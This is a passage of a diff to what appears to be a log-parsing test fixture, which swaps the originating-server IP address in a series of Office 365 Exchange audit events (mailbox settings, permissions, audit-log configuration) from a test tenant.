"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5244,7 +5244,7 @@ "Operation": "Set-ExchangeAssistanceConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Identity", @@ -5270,7 +5270,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5282,7 +5282,7 @@ "Operation": "Set-RecipientEnforcementProvisioningPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5312,7 +5312,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5324,7 +5324,7 @@ "Operation": "Set-TenantObjectVersion", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5346,7 +5346,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5358,7 +5358,7 @@ "Operation": "Add-MailboxPermission", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5388,7 +5388,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5400,7 +5400,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5422,7 +5422,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5434,7 +5434,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5464,7 +5464,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5476,7 +5476,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5550,7 +5550,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5562,7 +5562,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5636,7 +5636,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 